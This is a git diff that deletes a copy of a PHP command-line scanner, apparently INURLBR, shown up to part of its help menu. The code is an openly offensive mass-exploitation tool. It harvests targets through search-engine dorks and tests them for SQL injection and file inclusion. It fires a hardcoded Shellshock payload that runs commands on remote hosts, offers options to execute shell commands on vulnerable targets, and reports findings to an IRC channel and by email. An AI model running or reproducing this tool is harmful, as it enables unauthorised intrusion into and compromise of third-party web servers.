diff --git a/bin/inurlbr.php~ b/bin/inurlbr.php~
deleted file mode 100644
index 6014906..0000000
--- a/bin/inurlbr.php~
+++ /dev/null
@@ -1,3861 +0,0 @@
-#!/usr/bin/php -q
- SQLI, LFI, LFD.
- - Filter and validation based regular expression.
- - Extraction of email and url.
- - Validation using http-code.
- - Search pages based on strings file.
- - Exploits commands manager.
- - Paging limiter on search engines.
- - Beep sound when trigger vulnerability note.
- - Use text file as a data source for urls tests.
- - Find personalized strings in return values of the tests.
- - Validation vulnerability shellshock.
- - File validation values wordpress wp-config.php.
- - Execution sub validation processes.
- - Validation syntax errors database and programmin.
- - Data encryption as native parameter.
- - Random google host.
- - Scan port.
- - Error Checking & values:
- [*]JAVA INFINITYDB, [*]LOCAL FILE INCLUSION, [*]ZIMBRA MAIL, [*]ZEND FRAMEWORK,
- [*]ERROR MARIADB, [*]ERROR MYSQL, [*]ERROR JBOSSWEB, [*]ERROR MICROSOFT,
- [*]ERROR ODBC, [*]ERROR POSTGRESQL, [*]ERROR JAVA INFINITYDB, [*]ERROR PHP,
- [*]CMS WORDPRESS, [*]SHELL WEB, [*]ERROR JDBC, [*]ERROR ASP,
- [*]ERROR ORACLE, [*]ERROR DB2, [*]JDBC CFM, [*]ERROS LUA,
- [*]ERROR INDEFINITE
-
- [+] Dependencies - (PHP 5.4.*):
- sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl
-
-
- [+] Play LIST TUTORIAL:
- https://www.youtube.com/watch?v=jwjZUsgf9xM&list=PLV1376pVwcCmcoCmq_Z4O0ra4BqjmhIaR
-
-
- +--------------------------------------------------------------------------------------+
- | | | G R 3 3 T S | | |
- +--------------------------------------------------------------------------------------+
- * r00t-3xp10t, Jh00n, chk_, Unknownantisec, sl4y3r 0wn3r, hc0d3r, arplhmd, 0x4h4x
- * Clandestine, KoubackTr, SnakeTomahawk, SkyRedFild, Lorenzo Faletra, Eclipse, shaxer
- * dd3str0y3r, Johnny Deep, Lenon Leite, pSico_b0y, Bakunim_Malvadão, IceKiller, c00z
- * Oystex, rH, Warflop, se4b3ar
-
- */
-
-error_reporting(0);
-set_time_limit(0);
-ini_set('memory_limit', '256M');
-ini_set('display_errors', 0);
-ini_set('max_execution_time', 0);
-ini_set('allow_url_fopen', 1);
-(!isset($_SESSION) ? session_start() : NULL);
-__OS();
-
-
-/*
- [+]Capturing TERMINAL VALUES.
- (PHP 4 >= 4.3.0, PHP 5)getopt - Gets options from the command line argument list
- http://php.net/manual/pt_BR/function.getopt.php */
-$commandos_list = array(
- 'dork:', 'dork-file:', 'exploit-cad:', 'range:', 'range-rand:', 'irc:',
- 'exploit-all-id:', 'exploit-vul-id:', 'exploit-get:', 'exploit-post:',
- 'regexp-filter:', 'exploit-command:', 'command-all:', 'command-vul:',
- 'replace:', 'remove:', 'regexp:', 'sall:', 'sub-file:', 'sub-get::', 'sub-concat:',
- 'user-agent:', 'url-reference:', 'delay:', 'sendmail:', 'time-out:',
- 'http-header:', 'ifcode:', 'ifurl:', 'ifemail:', 'mp:', 'target:',
- 'no-banner::', 'gc::', 'proxy:', 'proxy-file:', 'time-proxy:', 'pr::',
- 'proxy-http-file:', 'update::', 'info::', 'help::', 'unique::', 'popup::',
- 'ajuda::', 'install-dependence::', 'cms-check::', 'sub-post::', 'robots::',
- 'alexa-rank::', 'beep::', 'exploit-list::', 'tor-random::', 'shellshock::',
- 'dork-rand:', 'sub-cmd-all:', 'sub-cmd-vul:', 'port-cmd:', 'port-scan:',
- 'port-write:', 'ifredirect:', 'persist:', 'file-cookie:', 'save-as:'
-);
-
-$opcoes = getopt('u::a:d:o:p:s:q:t:m::h::', $commandos_list);
-
-
-/*
- [+]VERIFYING LIB php5-curl IS INSTALLED.
- (PHP 4, PHP 5) function_exists — Return TRUE if the given function has been
- defined.
- http://php.net/manual/en/function.function-exists.php
-
- [+]Verification - CURL_EXEC
- Execute the given cURL session.
- This function should be called after initializing a cURL session and all the
- options for the session are set.
- http://php.net/manual/en/function.curl-exec.php */
-(!function_exists('curl_exec') ? __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]} INSTALLING THE LIBRARY php5-curl ex: php5-curl apt-get install{$_SESSION["c0"]}\n") : NULL );
-
-/*
- [+]VERIFYING use Input PHP CLI.
- (PHP 4, PHP 5) defined — Checks whether a given named constant exists
- http://php.net/manual/pt_BR/function.defined.php */
-(!defined('STDIN') ? __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]} Please run it through command-line!{$_SESSION["c0"]}\n") : NULL);
-
-
-#[+]Resetting VALUES $ _SESSION ['config']
-$_SESSION['config'] = array();
-$_SESSION['config']['version_script'] = '2.1';
-$_SESSION['config']['totas_urls'] = NULL;
-$_SESSION['config']["contUrl"] = 0;
-$_SESSION['config']['cont_email'] = 0;
-$_SESSION['config']['cont_url'] = 0;
-$_SESSION['config']['cont_valores'] = 0;
-
-#[+] FILE MANAGEMENT EXPLOITS.
-$_SESSION['config']['file_exploit_conf'] = 'exploits.conf';
-
-#[+] FOLDER WHERE WILL BE SAVED PROCESSES.
-$_SESSION['config']['out_put_paste'] = 'output/';
-
-/*
- [+]USER-AGENT EXPLOIT SHELLSHOCK
- (CVE-2014-6271, CVE-2014-6277,
- CVE-2014-6278, CVE-2014-7169,
- CVE-2014-7186, CVE-2014-7187)
- is a vulnerability in GNU's bash shell that gives attackers access to run remote
- commands on a vulnerable system. */
-$_SESSION['config']['user_agent_xpl'] = "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;\"";
-
-#[+]BLACK LIST URL-STRINGS
-$_SESSION['config']['blacklist'] = "//t.co,google.,youtube.,jsuol.com,.radio.uol.,b.uol.,barra.uol.,whowhere.,hotbot.,amesville.,lycos,lygo.,orkut.,schema.,blogger.,bing.,w3.,yahoo.,yimg.,creativecommons.org,ndj6p3asftxboa7j.,.torproject.org,.lygo.com,.apache.org,.hostname.,document.,";
-$_SESSION['config']['blacklist'].= "live.,microsoft.,ask.,shifen.com,answers.,analytics.,googleadservices.,sapo.pt,favicon.,blogspot.,wordpress.,.css,scripts.js,jquery-1.,dmoz.,gigablast.,aol.,.macromedia.com,.sitepoint.,yandex.,www.tor2web.org,.securityfocus.com,.Bootstrap.,.metasploit.com,";
-$_SESSION['config']['blacklist'].= "aolcdn.,altavista.,clusty.,teoma.,baiducontent.com,wisenut.,a9.,uolhost.,w3schools.,msn.,baidu.,hao123.,shifen.,procog.,facebook.,twitter.,flickr.,.adobe.com,oficinadanet.,elephantjmjqepsw.,.shodan.io,kbhpodhnfxl3clb4,.scanalert.com,.prototype.,feedback.core,";
-$_SESSION['config']['blacklist'].= "4shared.,.KeyCodeTab,.style.,www/cache/i1,.className.,=n.,a.Ke=,Y.config,.goodsearch.com,style.top,n.Img,n.canvas.,t.search,Y.Search.,a.href,a.currentStyle,a.style,yastatic.,.oth.net,.hotbot.com,.zhongsou.com,ezilon.com,.example.com,location.href,.navigation.,";
-$_SESSION['config']['blacklist'].= ".bingj.com,Y.Mobile.,srpcache?p,stackoverflow.,shifen.,baidu.,baiducontent.,gstatic.,php.net,wikipedia.,webcache.,inurl.,naver.,navercorp.,windows.,window.,.devmedia,imasters.,.inspcloud.com,.lycos.com,.scorecardresearch.com,.target.,JQuery.min,Element.location.,";
-$_SESSION['config']['blacklist'].= "exploit-db,packetstormsecurity.,1337day,owasp,.sun.com,mobile10.dtd,onabort=function,inurl.com.br,purl.org,.dartsearch.net,r.cb,.classList.,.pt_BR.,github,microsofttranslator.com,.compete.com,.sogou.com,gmail.,blackle.com,boorow.com,gravatar.com,sourceforge.,.mozilla.org";
-
-$_SESSION['config']['line'] = "\n{$_SESSION["c1"]} _[ - ]{$_SESSION["c7"]}::{$_SESSION["c1"]}--------------------------------------------------------------------------------------------------------------{$_SESSION["c0"]}";
-
-#[+]PRINTING HELP / INFO
-(isset($opcoes['h']) || isset($opcoes['help']) || isset($opcoes['ajuda']) ? __menu() : NULL);
-(isset($opcoes['info']) ? __info() : NULL);
-
-#[+]PRINTING EXPLOITS LIST.
-(isset($opcoes['exploit-list']) ? print(__bannerLogo()) . __configExploitsList(1) : NULL);
-
-#[+]CREATING DEFAULT SETTINGS EXIT RESULTS.
-(!is_dir($_SESSION['config']['out_put_paste']) ? mkdir($_SESSION['config']['out_put_paste'], 0777, TRUE) : NULL);
-
-#[+]CREATING DEFAULT SETTINGS MANAGEMENT EXPLOITS.
-(!file_exists($_SESSION['config']['file_exploit_conf']) ? touch($_SESSION['config']['file_exploit_conf']) : NULL);
-
-#[+]Deletes FILE cookie STANDARD.
-(file_exists('cookie.txt') ? unlink('cookie.txt') : NULL);
-
-#[+]REGISTRATION NEW COMMAND EXPLOIT
-(not_isnull_empty($opcoes['exploit-cad']) ? __configExploitsADD($opcoes['exploit-cad']) : NULL);
-
-#[+]Dependencies installation
-(isset($opcoes['install-dependence']) ? __installDepencia() : NULL);
-
-#[+]UPDATE SCRIPT
-(isset($opcoes['update']) ? __update() : NULL);
-
-################################################################################
-#CAPTURE OPTIONS################################################################
-################################################################################
-#[+]VALIDATION SEARCH METHODS / (DORK,RANGE-IP)
-if (not_isnull_empty($opcoes['o'])) {
-
- $_SESSION['config']['abrir-arquivo'] = $opcoes['o'];
-} else if (!not_isnull_empty($opcoes['o']) &&
- !not_isnull_empty($opcoes['range']) &&
- !not_isnull_empty($opcoes['range-rand']) &&
- !not_isnull_empty($opcoes['dork-rand'])) {
-
- $_SESSION['config']['dork'] = not_isnull_empty($opcoes['dork']) && is_null($_SESSION['config']['abrir-arquivo']) ? $opcoes['dork'] : NULL;
- $_SESSION['config']['dork-file'] = not_isnull_empty($opcoes['dork-file']) && is_null($_SESSION['config']['abrir-arquivo']) ? $opcoes['dork-file'] : NULL;
- (!not_isnull_empty($_SESSION['config']['dork']) && !not_isnull_empty($_SESSION['config']['dork-file']) ? __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]}DEFINE DORK ex: --dork '.asp?CategoryID=' OR --dork-file 'dorks.txt'{$_SESSION["c0"]}\n") : NULL);
-}
-
-#[+]VALIDATION GENERATE DORKS RANDOM
-$_SESSION['config']['dork-rand'] = not_isnull_empty($opcoes['dork-rand']) ? $opcoes['dork-rand'] : NULL;
-
-#[+]VALIDATION TARGET FIND PAGE
-$_SESSION['config']['target'] = not_isnull_empty($opcoes['target']) && !isset($_SESSION['config']['dork']) ? $opcoes['target'] : NULL;
-
-#[+]VALIDATION URL EXTRACTION
-$_SESSION['config']['extrai-url'] = isset($opcoes['u']) ? TRUE : NULL;
-
-#[+]VALIDATION EMAIL EXTRACTION
-$_SESSION['config']['extrai-email'] = isset($opcoes['m']) ? TRUE : NULL;
-
-#[+]VALIDATION ID SEARCH ENGINE
-$_SESSION['config']['motor'] = not_isnull_empty($opcoes['q']) &&
- __validateOptions('1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,e1,e2,e3,e4,e5,e6,all', $opcoes['q']) ? $opcoes['q'] : 1;
-
-#[+]VALIDATION SAVE FILE VULNERABLE
-!not_isnull_empty($opcoes['s']) && !not_isnull_empty($opcoes['save-as']) && empty($opcoes['sall']) ?
- __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]}DEFINE FILE SAVE OUTPUT ex: -s , --save-as , --sall filevull.txt{$_SESSION["c0"]}\n") : NULL;
-
-$_SESSION['config']['s'] = not_isnull_empty($opcoes['s']) ? $opcoes['s'] : null;
-
-$_SESSION['config']['save-as'] = not_isnull_empty($opcoes['save-as']) ? $opcoes['save-as'] : null;
-
-$_SESSION['config']['arquivo_output'] = not_isnull_empty($_SESSION['config']['s']) ? $_SESSION['config']['s'] : $opcoes['save-as'];
-
-#[+]VALIDATION SAVE FILE ALL VALORES
-$_SESSION['config']['arquivo_output_all'] = not_isnull_empty($opcoes['sall']) ? $opcoes['sall'] : NULL;
-
-#[+]VALIDATION TYPE ERROR
-$_SESSION['config']['tipoerro'] = not_isnull_empty($opcoes['t']) && __validateOptions('1,2,3,4,5', $opcoes['t']) ? $opcoes['t'] : 1;
-
-#[+]VALIDATION REPLACEMENT VALUES
-$_SESSION['config']['replace'] = not_isnull_empty($opcoes['replace']) ? $opcoes['replace'] : NULL;
-
-#[+]VALIDATION SET PROXY
-$_SESSION['config']['proxy'] = not_isnull_empty($opcoes['proxy']) ? $opcoes['proxy'] : NULL;
-
-#[+]VALIDATION SET FILE WITH LIST OF PROXY
-$_SESSION['config']['proxy-file'] = not_isnull_empty($opcoes['proxy-file']) ? $opcoes['proxy-file'] : NULL;
-
-#[+]VALIDATION SET HTTP->PROXY
-$_SESSION['config']['proxy-http'] = not_isnull_empty($opcoes['proxy-http']) ? $opcoes['proxy-http'] : NULL;
-
-#[+]VALIDATION SET FILE WITH LIST OF HTTP->PROXY
-$_SESSION['config']['proxy-http-file'] = not_isnull_empty($opcoes['proxy-http-file']) ? $opcoes['proxy-http-file'] : NULL;
-
-#[+]VALIDATION SET EXPLOIT VIA REQUEST GET
-$_SESSION['config']['exploit-get'] = not_isnull_empty($opcoes['exploit-get']) ? str_replace(' ', '%20', $opcoes['exploit-get']) : NULL;
-
-#[+]VALIDATION SET EXPLOIT VIA REQUEST POST
-$_SESSION['config']['exploit-post'] = not_isnull_empty($opcoes['exploit-post']) ? __convertUrlQuery($opcoes['exploit-post']) : NULL;
-$_SESSION['config']['exploit-post_str'] = not_isnull_empty($opcoes['exploit-post']) ? $opcoes['exploit-post'] : NULL;
-
-#[+]VALIDATION COMMAND SHELL STRING COMPLEMENTARY
-$_SESSION['config']['exploit-command'] = not_isnull_empty($opcoes['exploit-command']) ? $opcoes['exploit-command'] : NULL;
-
-#[+]VALIDATION MANAGEMENT COMMANDS SHELL TARGET VULN ID
-$_SESSION['config']['exploit-vul-id'] = not_isnull_empty($opcoes['exploit-vul-id']) ? $opcoes['exploit-vul-id'] : NULL;
-
-#[+]VALIDATION MANAGEMENT COMMANDS SHELL ALL TARGET ID
-$_SESSION['config']['exploit-all-id'] = not_isnull_empty($opcoes['exploit-all-id']) ? $opcoes['exploit-all-id'] : NULL;
-
-#[+]VALIDATION SET COMMANDS SHELL EXECUTE TARGET VULN
-$_SESSION['config']['command-vul'] = not_isnull_empty($opcoes['command-vul']) ? $opcoes['command-vul'] : NULL;
-
-#[+]VALIDATION SET COMMANDS SHELL EXECUTE ALL TARGET
-$_SESSION['config']['command-all'] = not_isnull_empty($opcoes['command-all']) ? $opcoes['command-all'] : NULL;
-
-#[+]VALIDATION ADDITIONAL TYPE OF PARAMETER ERROR
-$_SESSION['config']['achar'] = not_isnull_empty($opcoes['a']) ? $opcoes['a'] : NULL;
-
-#[+]VALIDATION DEBUG NIVEL
-$_SESSION['config']['debug'] = not_isnull_empty($opcoes['d']) && __validateOptions('1,2,3,4,5,6', $opcoes['d']) ? $opcoes['d'] : NULL;
-
-#[+]VALIDATION INTERNAL
-$_SESSION['config']['verifica_info'] = (__validateOptions($opcoes['d'], 6)) ? 1 : NULL;
-
-#[+]VALIDATION ADDITIONAL PARAMETER PROXY
-$_SESSION['config']['tor-random'] = isset($opcoes['tor-random']) && !is_null($_SESSION["config"]["proxy"]) ? TRUE : NULL;
-
-#[+]VALIDATION CHECK VALUES CMS
-$_SESSION['config']['cms-check'] = isset($opcoes['cms-check']) ? TRUE : NULL;
-
-#[+]VALIDATION CHECK LINKS WEBCACHE GOOGLE
-$_SESSION['config']['webcache'] = isset($opcoes['gc']) ? TRUE : NULL;
-
-#[+]VALIDATION REGULAR EXPRESSION
-$_SESSION['config']['regexp'] = not_isnull_empty($opcoes['regexp']) ? $opcoes['regexp'] : NULL;
-
-#[+]VALIDATION FILTER BY REGULAR EXPRESSION
-$_SESSION['config']['regexp-filter'] = not_isnull_empty($opcoes['regexp-filter']) ? $opcoes['regexp-filter'] : NULL;
-
-#[+]VALIDATION NO BANNER SCRIPT
-$_SESSION['config']['no-banner'] = isset($opcoes['no-banner']) ? TRUE : NULL;
-
-#[+]VALIDATION SET USER-AGENT REQUEST
-$_SESSION['config']['user-agent'] = not_isnull_empty($opcoes['user-agent']) ? $opcoes['user-agent'] : NULL;
-
-#[+]VALIDATION SET URL-REFERENCE REQUEST
-$_SESSION['config']['url-reference'] = not_isnull_empty($opcoes['url-reference']) ? $opcoes['url-reference'] : NULL;
-
-#[+]VALIDATION PAGING THE MAXIMUM SEARCH ENGINE
-$_SESSION['config']['max_pag'] = not_isnull_empty($opcoes['mp']) ? $opcoes['mp'] : NULL;
-
-#[+]VALIDATION DELAY SET PAGING AND PROCESSES
-$_SESSION['config']['delay'] = not_isnull_empty($opcoes['delay']) ? $opcoes['delay'] : NULL;
-
-#[+]VALIDATION SET TIME OUT REQUEST
-$_SESSION['config']['time-out'] = not_isnull_empty($opcoes['time-out']) ? $opcoes['time-out'] : NULL;
-
-#[+]VALIDATION CODE HTTP
-$_SESSION['config']['ifcode'] = not_isnull_empty($opcoes['ifcode']) ? $opcoes['ifcode'] : NULL;
-
-#[+]VALIDATION STRING URL
-$_SESSION['config']['ifurl'] = not_isnull_empty($opcoes['ifurl']) ? $opcoes['ifurl'] : NULL;
-
-#[+]VALIDATION SET HTTP HEADER
-$_SESSION['config']['http-header'] = not_isnull_empty($opcoes['http-header']) ? $opcoes['http-header'] : NULL;
-
-#[+]VALIDATION SET FILE SUB_PROCESS
-$_SESSION['config']['sub-file'] = not_isnull_empty($opcoes['sub-file']) ? __openFile($opcoes['sub-file'], 1) : NULL;
-
-#[+]VALIDATION SUB_PROCESS TYPE REQUEST POST
-$_SESSION['config']['sub-post'] = isset($opcoes['sub-post']) ? TRUE : NULL;
-
-#[+]VALIDATION SUB_PROCESS TYPE REQUEST GET
-$_SESSION['config']['sub-get'] = isset($opcoes['sub-get']) ? TRUE : NULL;
-
-#[+]VALIDATION SEND VULN EMAIL
-$_SESSION['config']['sendmail'] = not_isnull_empty($opcoes['sendmail']) ? $opcoes['sendmail'] : NULL;
-
-#[+]VALIDATION SHOW RANK ALEXA
-$_SESSION['config']['alexa-rank'] = isset($opcoes['alexa-rank']) ? TRUE : NULL;
-
-#[+]VALIDATION ACTIVATE BEEP WHEN APPEAR VULNERABLE
-$_SESSION['config']['beep'] = isset($opcoes['beep']) ? TRUE : NULL;
-
-#[+]VALIDATION OF SINGLE DOMAIN FILTER
-$_SESSION['config']['unique'] = isset($opcoes['unique']) ? TRUE : NULL;
-
-#[+]VALIDATION IRC SERVER/CHANNEL SEND VULN
-$_SESSION['config']['irc']['conf'] = not_isnull_empty($opcoes['irc']) && strstr($opcoes['irc'], '#') ? explode("#", $opcoes['irc']) : NULL;
-
-#[+]VALIDATION RANGE IP
-$_SESSION['config']['range'] = not_isnull_empty($opcoes['range']) && strstr($opcoes['range'], ',') ? $opcoes['range'] : NULL;
-
-#[+]VALIDATION QUANTITY RANGE IP RANDOM
-$_SESSION['config']['range-rand'] = not_isnull_empty($opcoes['range-rand']) ? $opcoes['range-rand'] : NULL;
-
-#[+]VALIDATION REMOVE STRING URL
-$_SESSION['config']['remove'] = not_isnull_empty($opcoes['remove']) ? $opcoes['remove'] : NULL;
-
-#[+]VALIDATION ACCESS FILE ROBOTS
-$_SESSION['config']['robots'] = isset($opcoes['robots']) ? TRUE : NULL;
-
-#[+]VALIDATION FILTER EMAIL STRING
-$_SESSION['config']['ifemail'] = not_isnull_empty($opcoes['ifemail']) ? $opcoes['ifemail'] : NULL;
-
-#[+]VALIDATION OPEN WINDOW CONSOLE PROCESS
-$_SESSION['config']['popup'] = isset($opcoes['popup']) ? TRUE : NULL;
-
-#[+]VALIDATION ACTIVATE SHELLSHOCK
-$_SESSION['config']['shellshock'] = isset($opcoes['shellshock']) ? TRUE : NULL;
-
-#[+]VALIDATION METHOD OF BUSTA PROGRESSIVE
-$_SESSION['config']['pr'] = isset($opcoes['pr']) ? TRUE : NULL;
-
-#[+]VALIDATION SET SUB-COMMANDS SHELL EXECUTE ALL TARGET
-$_SESSION['config']['sub-cmd-all'] = isset($opcoes['sub-cmd-all']) ? TRUE : NULL;
-
-#[+]VALIDATION SET SUB-COMMANDS SHELL EXECUTE TARGET VULN
-$_SESSION['config']['sub-cmd-vul'] = isset($opcoes['sub-cmd-vul']) ? TRUE : NULL;
-
-#[+]VALIDATION SET POR VALIDATION
-$_SESSION['config']['port-cmd'] = not_isnull_empty($opcoes['port-cmd']) ? $opcoes['port-cmd'] : NULL;
-
-#[+]VALIDATION SET SCAN PORT
-$_SESSION['config']['port-scan'] = not_isnull_empty($opcoes['port-scan']) ? $opcoes['port-scan'] : NULL;
-
-#[+]VALIDATION SET PAYLOAD XPL PORT
-$_SESSION['config']['port-write'] = not_isnull_empty($opcoes['port-write']) ? $opcoes['port-write'] : NULL;
-
-#[+]VALIDATION SET URL REDIRECT HEADER
-$_SESSION['config']['ifredirect'] = not_isnull_empty($opcoes['ifredirect']) ? $opcoes['ifredirect'] : NULL;
-
-#[+]VALIDATION SET URL REDIRECT HEADER
-$_SESSION['config']['persist'] = not_isnull_empty($opcoes['persist']) ? $opcoes['persist'] : 4;
-
-#[+]VALIDATION SET FILE COOKIE
-$_SESSION['config']['file-cookie'] = not_isnull_empty($opcoes['file-cookie']) ? $opcoes['file-cookie'] : NULL;
-
-#[+]VALIDATION SET STRING CONCAT URL SUB-PROCESS
-$_SESSION['config']['sub-concat'] = not_isnull_empty($opcoes['sub-concat']) ? $opcoes['sub-concat'] : NULL;
-
-################################################################################
-#IRC CONFIGURATION##############################################################
-################################################################################
-
-if (is_array($_SESSION['config']['irc']['conf'])) {
-
- $alph = range("A", "Z");
- $_ = array(0 => rand(0, 10000), 1 => $alph[rand(0, count($alph))]);
- $_SESSION['config']['irc']['my_pid'] = 0;
- $_SESSION['config']['irc']['irc_server'] = $_SESSION['config']['irc']['conf'][0];
- $_SESSION['config']['irc']['irc_channel'] = "#{$_SESSION['config']['irc']['conf'][1]}";
- $_SESSION['config']['irc']['irc_port'] = 6667;
- $_SESSION['config']['irc']['localhost'] = "127.0.0.1 localhost";
- $_SESSION['config']['irc']['irc_nick'] = "[BOT]1nurl{$_[0]}[{$_[1]}]";
- $_SESSION['config']['irc']['irc_realname'] = "B0t_1NURLBR";
- $_SESSION['config']['irc']['irc_quiet'] = "Session Ended";
- global $conf;
-} elseif (!is_array($_SESSION['config']['irc']['conf']) && not_isnull_empty($opcoes['irc'])) {
-
- __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]}IRC WRONG FORMAT! ex: --irc 'irc.rizon.net#inurlbrasil' {$_SESSION["c0"]}\n");
-}
-
-################################################################################
-#IRC CONECTION##################################################################
-################################################################################
-
-function __ircConect($conf) {
-
- $fp = fsockopen($conf['irc_server'], $conf['irc_port'], $conf['errno'], $conf['errstr'], 30);
- if (!$fp) {
-
- echo "Error: {$conf['errstr']}({$conf['errno']})\n";
- return NULL;
- }
- $u = php_uname();
- fwrite($fp, "NICK {$conf['irc_nick']}\r\n");
- fwrite($fp, "USER {$conf['irc_nick']} 8 * :{$conf['irc_realname']}\r\n");
- fwrite($fp, "JOIN {$conf['irc_channel']}\r\n");
- fwrite($fp, "PRIVMSG {$conf['irc_channel']} :[ SERVER ] {$u}\r\n");
- return $fp;
-}
-
-################################################################################
-#IRC SEND MSG###################################################################
-################################################################################
-
-function __ircMsg($conf, $msg) {
-
- fwrite($conf['irc_connection'], "PRIVMSG ${conf['irc_channel']} :${msg}\r\n") . sleep(2);
- __plus();
-}
-
-################################################################################
-#IRC PING PONG##################################################################
-################################################################################
-
-function __ircPong($conf) {
-
- while (!feof($conf['irc_connection'])) {
-
- $conf['READ_BUFFER'] = fgets($conf['irc_connection']);
- __plus();
- if (preg_match("/^PING(.+)/", $conf['READ_BUFFER'], $conf['ret'])) {
-
- __debug(array('debug' => "[ PING-PONG ]{$conf['ret'][1]}", 'function' => '__ircPong'), 6) . __plus();
- fwrite($conf['READ_BUFFER'], "PONG {$conf['ret'][1]}\r\n");
- ($_SESSION['config']['debug'] == 6) ?
- fwrite($conf['irc_connection'], "PRIVMSG ${conf['irc_channel']} :[ PING-PONG ]-> {$conf['ret'][1]}->function:__ircPong\r\n") : NULL;
- }
- }
-}
-
-################################################################################
-#IRC QUIT#######################################################################
-################################################################################
-
-function __ircQuit($conf) {
-
- fwrite($conf['irc_connection'], "QUIT {$conf['irc_quiet']}\r\n") . sleep(2);
- __plus();
- fclose($conf['irc_connection']);
-}
-
-#END IRC########################################################################
-#UPDATE SCRIPT##################################################################
-################################################################################
-
-function __update() {
-
- echo __bannerLogo();
-
- echo "{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}WANT TO MAKE UPDATE SCRIPT\n{$_SESSION["c0"]}";
- echo "{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}This can modify the current script\n{$_SESSION["c0"]}";
- echo "{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}ARE YOU SURE ? (y \ n): {$_SESSION["c0"]}";
-
- if (trim(fgets(STDIN)) == 'y') {
-
- $resultado = __request_info("https://raw.githubusercontent.com/googleinurl/SCANNER-INURLBR/master/inurlbr.php", $_SESSION["config"]["proxy"], NULL);
-
- if (not_isnull_empty($resultado['corpo'])) {
-
- unlink('inurlbr.php');
- $varf = fopen('inurlbr.php', 'a');
- fwrite($varf, $resultado['corpo']);
- fclose($varf);
- chmod('inurlbr.php', 0777);
- echo "\nUPDATE DONE WITH SUCCESS!\n";
- sleep(3);
- system("chmod +x inurlbr.php | php inurlbr.php");
- exit();
- } else {
-
- echo system("command clear") . __bannerLogo();
- echo "{$_SESSION["c1"]}__[ x ] {$_SESSION["c16"]}FAILURE TO SERVER!\n{$_SESSION["c0"]}";
- }
- }
-}
-
-################################################################################
-#SECURITIES VALIDATION DOUBLE#####################################################
-################################################################################
-
-function not_isnull_empty($valor = NULL) {
-
- RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;
-}
-
-################################################################################
-#MENU###########################################################################
-################################################################################
-
-function __menu() {
-
- return system("command clear") . __getOut(__extra() . "
- {$_SESSION["c1"]}_ _ ______ _ _____
-| | | | ____| | | __ \
-| |__| | |__ | | | |__) |
-| __ | __| | | | ___/
-| | | | |____| |____| |
-|_| |_|______|______|_|
-
-{$_SESSION["c1"]}[!]{$_SESSION["c0"]}Current PHP version=>[ {$_SESSION["c1"]}" . phpversion() . "{$_SESSION["c0"]} ]
-{$_SESSION["c1"]}[!]{$_SESSION["c0"]}Current script owner=>[ {$_SESSION["c1"]}" . get_current_user() . "{$_SESSION["c0"]} ]
-{$_SESSION["c1"]}[!]{$_SESSION["c0"]}Current uname=>[ {$_SESSION["c1"]}" . php_uname() . "{$_SESSION["c0"]} ]
-{$_SESSION["c1"]}[!]{$_SESSION["c0"]}Current pwd =>[ {$_SESSION["c1"]}" . getcwd() . "{$_SESSION["c0"]} ]
-" . $_SESSION['config']['line'] . "
-
-{$_SESSION["c1"]}-h{$_SESSION["c0"]}
-{$_SESSION["c1"]}--help{$_SESSION["c0"]} Alternative long length help command.
-{$_SESSION["c1"]}--ajuda{$_SESSION["c0"]} Command to specify Help.
-{$_SESSION["c1"]}--info{$_SESSION["c0"]} Information script.
-{$_SESSION["c1"]}--update{$_SESSION["c0"]} Code update.
-{$_SESSION["c1"]}-q{$_SESSION["c0"]} Choose which search engine you want through [{$_SESSION["c2"]}1...24{$_SESSION["c0"]}] / [{$_SESSION["c2"]}e1..6{$_SESSION["c0"]}]]:
- [options]:
- {$_SESSION["c1"]}1{$_SESSION["c0"]} - {$_SESSION["c2"]}GOOGLE / (CSE) GENERIC RANDOM / API
- {$_SESSION["c1"]}2{$_SESSION["c0"]} - {$_SESSION["c2"]}BING
- {$_SESSION["c1"]}3{$_SESSION["c0"]} - {$_SESSION["c2"]}YAHOO BR
- {$_SESSION["c1"]}4{$_SESSION["c0"]} - {$_SESSION["c2"]}ASK
- {$_SESSION["c1"]}5{$_SESSION["c0"]} - {$_SESSION["c2"]}HAO123 BR
- {$_SESSION["c1"]}6{$_SESSION["c0"]} - {$_SESSION["c2"]}GOOGLE (API)
- {$_SESSION["c1"]}7{$_SESSION["c0"]} - {$_SESSION["c2"]}LYCOS
- {$_SESSION["c1"]}8{$_SESSION["c0"]} - {$_SESSION["c2"]}UOL BR
- {$_SESSION["c1"]}9{$_SESSION["c0"]} - {$_SESSION["c2"]}YAHOO US
- {$_SESSION["c1"]}10{$_SESSION["c0"]} - {$_SESSION["c2"]}SAPO
- {$_SESSION["c1"]}11{$_SESSION["c0"]} - {$_SESSION["c2"]}DMOZ
- {$_SESSION["c1"]}12{$_SESSION["c0"]} - {$_SESSION["c2"]}GIGABLAST
- {$_SESSION["c1"]}13{$_SESSION["c0"]} - {$_SESSION["c2"]}NEVER
- {$_SESSION["c1"]}14{$_SESSION["c0"]} - {$_SESSION["c2"]}BAIDU BR
- {$_SESSION["c1"]}15{$_SESSION["c0"]} - {$_SESSION["c2"]}YANDEX
- {$_SESSION["c1"]}16{$_SESSION["c0"]} - {$_SESSION["c2"]}ZOO
- {$_SESSION["c1"]}17{$_SESSION["c0"]} - {$_SESSION["c2"]}HOTBOT
- {$_SESSION["c1"]}18{$_SESSION["c0"]} - {$_SESSION["c2"]}ZHONGSOU
- {$_SESSION["c1"]}19{$_SESSION["c0"]} - {$_SESSION["c2"]}HKSEARCH
- {$_SESSION["c1"]}20{$_SESSION["c0"]} - {$_SESSION["c2"]}EZILION
